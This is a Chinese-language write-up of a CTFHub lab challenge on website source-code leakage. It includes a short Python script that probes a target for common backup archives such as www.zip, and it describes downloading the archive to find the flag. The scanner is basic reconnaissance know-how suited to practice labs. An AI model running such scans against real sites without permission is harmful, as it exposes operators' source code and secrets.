CTFHub技能树 Web-信息泄露 网站源码

CTFHub技能树 Web-信息泄露 网站源码

hit:当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站源码泄露。

启动环境:
CTFHub技能树 Web-信息泄露 网站源码_第1张图片
打开后,给出了常用备份文件的后缀和文件名等内容。
使用Python3脚本对其进行扫描:

import requests

url1 = 'http://xxx.com'		# url为被扫描地址,后不加‘/’

# 常见的网站源码备份文件名
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar']

for i in list1:
    for j in list2:
        back = str(i) + '.' + str(j)
        url = str(url1) + '/' + back
        print(back + '    ', end='')
        print(requests.get(url).status_code)

对其进行扫描后,得到:
CTFHub技能树 Web-信息泄露 网站源码_第2张图片
其中www.zip访问状态为200
浏览器访问:

http://xxx.sandbox.ctfhub.com:10080/www.zip

下载备份文件并解压:
CTFHub技能树 Web-信息泄露 网站源码_第3张图片
打开flag_142811300.txt后得到:
在这里插入图片描述
在浏览器访问/flag_142811300.txt后,得到flag:
在这里插入图片描述

你可能感兴趣的:(CTFHub,WEB,Writeup,CTFHub技能树,Web-信息泄露,网站源码,writeup,CTF)